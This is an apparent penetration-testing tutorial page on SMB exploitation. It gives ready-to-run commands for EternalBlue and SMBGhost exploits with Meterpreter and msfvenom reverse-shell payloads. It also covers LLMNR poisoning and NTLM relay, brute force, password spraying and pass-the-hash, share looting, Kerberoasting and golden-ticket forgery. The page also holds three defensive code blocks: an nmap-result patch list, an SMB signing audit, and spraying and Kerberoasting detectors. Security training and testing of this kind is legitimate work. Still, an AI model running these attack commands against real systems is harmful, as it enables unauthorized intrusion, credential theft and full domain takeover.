Phase 3: Active Exploitation

SMB Exploitation

Advanced SMB/CIFS exploitation techniques for penetration testing. Learn to safely exploit vulnerabilities and gain unauthorized access to target systems.

Remote Code Execution: Exploit critical vulnerabilities like EternalBlue and SMBGhost
Credential Attacks: Brute force, relay attacks, and hash-based authentication
Share Exploitation: Leverage misconfigured shares for unauthorized access
Critical Exploits
EternalBlue Exploitation (MS17-010)
Remote code execution vulnerability in SMBv1 that allows complete system compromise

Vulnerability Verification

# Verify EternalBlue vulnerability
nmap --script smb-vuln-ms17-010 -p445 <target_ip>

# Alternative verification with Metasploit
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target_ip>
run

Always verify the vulnerability exists before attempting exploitation. This prevents unnecessary noise and failed exploitation attempts.

Metasploit Exploitation

# Launch Metasploit console
msfconsole

# Use EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue

# Configure target and payload
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444

# Execute the exploit
exploit

Successful exploitation provides a Meterpreter session with SYSTEM privileges on the target system.

Manual Exploitation with Python

# Clone EternalBlue exploit
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > sc_x64.bin

# Execute exploit
python eternalblue_exploit7.py <target_ip> sc_x64.bin

Manual exploitation provides more control over the payload and exploitation process.

SMBGhost Exploitation (CVE-2020-0796)
SMBv3 compression vulnerability affecting Windows 10 and Server 2019

Vulnerability Detection

# Check for SMBGhost vulnerability
nmap --script smb-vuln-cve-2020-0796 -p445 <target_ip>

# Alternative detection script
python3 cve-2020-0796-scanner.py <target_ip>
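The two verification scans above (smb-vuln-ms17-010 for EternalBlue and the CVE-2020-0796 check for SMBGhost) are most useful to a defender once their results become a patch list. The block below is an added example, not code from this page or from the nmap project: it parses nmap's -oX XML output for any smb-vuln-* script result and lists the hosts whose reported state is VULNERABLE together with a remediation note. The XML sample is constructed for the example; the element layout (a <script> element holding a <table key="CVE-..."> with an <elem key="state">) is the layout nmap's vulns library emits, and the remediation strings and the finding-to-fix mapping are mine.

```python
"""Added example: turn nmap smb-vuln-* XML results into a patch-priority list.

Assumes nmap was run with -oX and that the vulns-library layout shown in the
constructed sample below is what the scanner produced.
"""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap --script smb-vuln-ms17-010,smb-vuln-cve-2020-0796 -p445 -oX out.xml`
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </port></ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-cve-2020-0796" output="VULNERABLE">
        <table key="CVE-2020-0796"><elem key="state">VULNERABLE</elem></table>
      </script>
    </port></ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
</nmaprun>
"""

# Finding id (as nmap reports it) -> what closes it. Wording is this example's own.
REMEDIATION = {
    "CVE-2017-0143": "apply MS17-010 and disable SMBv1",
    "CVE-2020-0796": "apply the CVE-2020-0796 update; disable SMBv3 compression as a workaround",
}


def vulnerable_hosts(xml_text):
    """Return {ipv4: [finding_id, ...]} for hosts with any smb-vuln-* state of VULNERABLE."""
    findings = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for script in host.iter("script"):
            if not script.get("id", "").startswith("smb-vuln-"):
                continue
            # One <table> per finding; its key is the CVE and it carries the state.
            for table in script.findall("table"):
                state = table.findtext("elem[@key='state']", default="")
                if state.strip().upper() == "VULNERABLE":
                    findings.setdefault(addr, []).append(table.get("key"))
    return findings


def patch_list(xml_text):
    """One human-readable line per vulnerable host, sorted by address."""
    lines = []
    for addr, cves in sorted(vulnerable_hosts(xml_text).items()):
        fixes = "; ".join(f"{c}: {REMEDIATION.get(c, 'see vendor advisory')}" for c in cves)
        lines.append(f"{addr}  {fixes}")
    return lines


if __name__ == "__main__":
    print("\n".join(patch_list(SAMPLE_XML)))
```

Hosts where port 445 is filtered produce no script output at all, so they are absent from the list rather than reported clean; treat "not in the list" as "not assessed" unless the port state was open.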

Exploitation Process

# Clone SMBGhost exploit
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC

# Compile the exploit
gcc -o exploit exploit.c

# Execute against target
./exploit <target_ip>

SMBGhost exploitation is more complex and may require custom shellcode development for reliable execution.

SMB Relay Attacks
Exploit SMB authentication mechanisms to gain unauthorized access to other systems

LLMNR/NBT-NS Poisoning

# Start Responder to capture hashes
responder -I eth0 -rdwv

# Same capture, additionally fingerprinting hosts that respond (-f)
responder -I eth0 -rdwv -f

# Analyze captured hashes
cat /usr/share/responder/logs/*.txt

Responder captures NetNTLM hashes when systems attempt to resolve non-existent hostnames.

SMB Relay with ntlmrelayx

# Create target list
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt

# Start SMB relay attack
ntlmrelayx.py -tf targets.txt -smb2support

# Relay with command execution
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# With no -c/-e given, the default SMB action dumps the target's local SAM (disable with --no-dump)
ntlmrelayx.py -tf targets.txt -smb2support

SMB relay attacks forward captured authentication to other systems where SMB signing is not required.
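Whether relay works against a host comes down to the SecurityMode flags the server returns in its SMB2 NEGOTIATE response, so the defender's audit is to read that field across the estate and fix every server that does not report signing as required. The block below is an added example, not code from this page or from Impacket: it builds an SMB2 NEGOTIATE request, parses the response header and body with the layout from MS-SMB2, and classifies the signing posture. The parser is exercised offline on a constructed response; the live check (check_host) assumes direct-hosted SMB on TCP/445 and a server that speaks SMB 2.x/3.x. Dialect values, flag bits and field offsets are from the protocol specification; the helper names are mine.

```python
"""Added example: audit an SMB server's signing requirement from its NEGOTIATE response.

Assumes direct SMB over TCP/445 (4-byte NetBIOS session length prefix) and an SMB2/3 server.
"""
import socket
import struct
import uuid

SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
HEADER_FMT = "<4sHHIHHIIQIIQ16s"  # 64-byte SMB2 header (MS-SMB2 2.2.1.2)


def build_negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)):
    """SMB2 header + NEGOTIATE request body offering SMB 2.0.2 through 3.0.2."""
    header = struct.pack(HEADER_FMT, b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
                         0, 0, 0, 0, 0, 0, b"\x00" * 16)
    # StructureSize=36, DialectCount, SecurityMode, Reserved, Capabilities, ClientGuid, ClientStartTime
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0,
                       uuid.uuid4().bytes, 0)
    return header + body + struct.pack("<%dH" % len(dialects), *dialects)


def parse_negotiate_response(msg):
    """Return (dialect, security_mode) from an SMB2 NEGOTIATE response without NetBIOS prefix."""
    if len(msg) < 64 + 6 or msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    status, = struct.unpack_from("<I", msg, 8)   # Status sits at header offset 8
    command, = struct.unpack_from("<H", msg, 12)  # Command at offset 12
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected command {command:#x} / status {status:#x}")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if struct_size != 65:  # fixed StructureSize of a NEGOTIATE response
        raise ValueError("bad NEGOTIATE response StructureSize")
    return dialect, security_mode


def signing_posture(security_mode):
    """'required' is the only posture that defeats relay; the other two are findings."""
    if security_mode & SIGNING_REQUIRED:
        return "required"
    if security_mode & SIGNING_ENABLED:
        return "enabled-not-required"
    return "disabled"


def check_host(host, port=445, timeout=5):
    """Live audit: returns (dialect, posture). Needs network reachability to the server."""
    req = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)  # NetBIOS session header: 0x00 + 3-byte length
        length = struct.unpack(">I", s.recv(4))[0] & 0xFFFFFF
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    dialect, mode = parse_negotiate_response(data)
    return dialect, signing_posture(mode)


def constructed_response(security_mode, dialect=0x0302):
    """A minimal well-formed NEGOTIATE response for offline testing (constructed, not captured)."""
    header = struct.pack(HEADER_FMT, b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
                         0x1, 0, 0, 0, 0, 0, b"\x00" * 16)  # Flags=SERVER_TO_REDIR
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print(check_host(sys.argv[1]))
    else:
        print("offline self-check:", signing_posture(parse_negotiate_response(constructed_response(0x01))[1]))
```

Any host answering "enabled-not-required" or "disabled" should get the policy "Microsoft network server: Digitally sign communications (always)" enabled; nmap's smb2-security-mode script reports the same field if you prefer to fold the audit into an existing scan.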

Credential-Based Attacks
Brute force attacks, password spraying, and hash-based authentication

Password Attacks with CrackMapExec

# Single target brute force
crackmapexec smb <target_ip> -u users.txt -p passwords.txt

# Password spraying across multiple targets
crackmapexec smb targets.txt -u admin -p Password123

# Test common credentials
crackmapexec smb <target_ip> -u administrator -p admin
crackmapexec smb <target_ip> -u guest -p ""

Use wordlists and common credentials to identify weak authentication configurations.

Pass-the-Hash Attacks

# Pass-the-hash with CrackMapExec
crackmapexec smb <target_ip> -u username -H <ntlm_hash>

# Pass-the-hash across multiple targets
crackmapexec smb targets.txt -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# Execute commands with hash
crackmapexec smb <target_ip> -u username -H <hash> -x "whoami"

Pass-the-hash attacks use captured NTLM hashes for authentication without knowing the plaintext password.

Share Access and Enumeration

# Access shares with valid credentials
smbclient //<target_ip>/C$ -U username

# Map all accessible shares
crackmapexec smb <target_ip> -u username -p password --shares

# Recursive share enumeration
smbmap -H <target_ip> -u username -p password -R

# Download sensitive files
smbget -R smb://<target_ip>/share/ -U username

Once credentials are obtained, enumerate and access available shares to gather sensitive information.

Advanced Exploitation Techniques
Sophisticated attack methods for complex environments

Kerberoasting

# Request service tickets for cracking
GetUserSPNs.py domain/username:password -dc-ip <dc_ip> -request

# Crack service tickets offline
hashcat -m 13100 tickets.txt wordlist.txt

# Alternative with Rubeus (Windows)
Rubeus.exe kerberoast /outfile:tickets.txt

Kerberoasting targets service accounts with weak passwords by requesting and cracking service tickets.
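Both the credential attacks in the previous section (brute force and password spraying, events 4625) and Kerberoasting (service ticket requests, events 4769) share one detectable shape: a single actor touching many distinct targets inside a short window. The block below is an added example, not code from this page or from any SIEM vendor: one sliding-window "distinct values per key" rule drives both detections over constructed Windows Security event records. Field names follow the Windows event schema (TargetUserName, IpAddress, ServiceName, TicketEncryptionType, shortened here), the RC4 type 0x17 is the Kerberoasting tell, and the window sizes and thresholds are assumed starting points to tune per environment.

```python
"""Added example: windowed detections for password spraying (4625) and Kerberoasting (4769).

Events are constructed Python dicts standing in for parsed Security log records.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType requested by classic Kerberoasting tooling


def sliding_window_distinct(events, key_field, distinct_field, window, threshold):
    """Group by key_field; alert when >= threshold distinct distinct_field values
    occur within any span of length `window`. One alert per key (first trigger)."""
    by_key = defaultdict(list)
    for e in events:
        by_key[e[key_field]].append((datetime.fromisoformat(e["time"]), e[distinct_field]))
    alerts = []
    for key, items in by_key.items():
        items.sort()
        counts = defaultdict(int)
        left = 0
        for t, val in items:
            counts[val] += 1
            while items[left][0] < t - window:  # evict events that fell out of the window
                old = items[left][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                left += 1
            if len(counts) >= threshold:
                alerts.append({"key": key, "distinct": len(counts),
                               "start": items[left][0], "end": t})
                break
    return alerts


def detect_spraying(events, window=timedelta(minutes=5), threshold=10):
    """One source IP failing logons for many different accounts."""
    failures = [e for e in events if e["id"] == 4625]
    return sliding_window_distinct(failures, "src", "user", window, threshold)


def detect_kerberoasting(events, window=timedelta(minutes=10), threshold=10):
    """One account requesting RC4 service tickets for many different SPNs."""
    rc4 = [e for e in events if e["id"] == 4769 and e["enc_type"] == RC4_HMAC]
    return sliding_window_distinct(rc4, "user", "service", window, threshold)


def constructed_events():
    """Constructed sample log, not real telemetry."""
    base = datetime(2024, 3, 1, 9, 0, 0)
    ev = []
    for i in range(12):  # spray: one source, twelve accounts, one failure each, 10 s apart
        ev.append({"id": 4625, "time": (base + timedelta(seconds=10 * i)).isoformat(),
                   "user": f"user{i:02d}", "src": "10.0.0.50"})
    for i in range(3):   # benign: one user mistyping their own password
        ev.append({"id": 4625, "time": (base + timedelta(seconds=30 * i)).isoformat(),
                   "user": "alice", "src": "10.0.0.21"})
    for i in range(15):  # roast: one account, fifteen SPNs, RC4, within a minute
        ev.append({"id": 4769, "time": (base + timedelta(seconds=4 * i)).isoformat(),
                   "user": "bob", "src": "10.0.0.77", "service": f"svc{i:02d}", "enc_type": RC4_HMAC})
    for i, svc in enumerate(("fs01", "sql01")):  # benign: ordinary AES ticket requests
        ev.append({"id": 4769, "time": (base + timedelta(minutes=i)).isoformat(),
                   "user": "carol", "src": "10.0.0.30", "service": svc, "enc_type": 0x12})
    return ev


if __name__ == "__main__":
    events = constructed_events()
    for a in detect_spraying(events):
        print(f"spray   from {a['key']}: {a['distinct']} accounts {a['start']}..{a['end']}")
    for a in detect_kerberoasting(events):
        print(f"roast   by   {a['key']}: {a['distinct']} SPNs {a['start']}..{a['end']}")
```

The RC4 filter is the high-signal rule, but tooling can request AES tickets, so a second, lower-severity rule over all encryption types with a higher threshold is worth running alongside it; service accounts with long random passwords or gMSA remove the incentive entirely.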

Golden Ticket Attacks

# Create golden ticket with mimikatz
kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:<hash> /ptt

# Alternative with Impacket
ticketer.py -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain domain.com administrator

# Use ticket for access
export KRB5CCNAME=administrator.ccache
smbclient //dc.domain.com/C$ -k

Golden tickets provide persistent domain access by forging Kerberos tickets with the KRBTGT hash.

Essential Tools

Metasploit: Framework with SMB exploitation modules
CrackMapExec: SMB credential attacks and lateral movement
Impacket: Python SMB implementation and tools
Responder: LLMNR/NBT-NS poisoning and hash capture
ntlmrelayx: SMB relay attack tool

Additional Resources

MITRE ATT&CK: Framework for understanding adversary tactics
OWASP Testing Guide: Comprehensive security testing methodology
Tenable Solutions: Professional vulnerability management
